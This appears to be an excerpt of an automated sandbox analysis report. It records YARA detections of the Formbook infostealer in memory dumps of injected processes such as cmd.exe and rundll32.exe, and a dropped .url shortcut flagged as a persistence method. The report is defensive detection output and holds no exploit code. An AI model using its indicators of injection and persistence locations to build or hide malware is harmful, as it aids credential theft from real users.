            Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: TR0627729920002.exe PID: 5932, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: cmd.exe PID: 564, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: Jwjxmakrv.exe PID: 2460, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: rundll32.exe PID: 4684, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: C:\Users\Public\Libraries\vrkamxjwJ.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
            Source: C:\Users\Public\Libraries\vrkamxjwJ.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9DBD25_2_03C9DBD2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0EBB05_2_03C0EBB0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA2B285_2_03CA2B28
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA22AE5_2_03CA22AE
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF41205_2_03BF4120
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDF9005_2_03BDF900
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA28EC5_2_03CA28EC
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BEB0905_2_03BEB090
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C020A05_2_03C020A0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA20A85_2_03CA20A8
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C910025_2_03C91002
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CAE8245_2_03CAE824
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA1FF15_2_03CA1FF1
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA2EF75_2_03CA2EF7
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF6E305_2_03BF6E30
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9D6165_2_03C9D616
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA25DD5_2_03CA25DD
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C025815_2_03C02581
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BED5E05_2_03BED5E0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD0D205_2_03BD0D20
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA1D555_2_03CA1D55
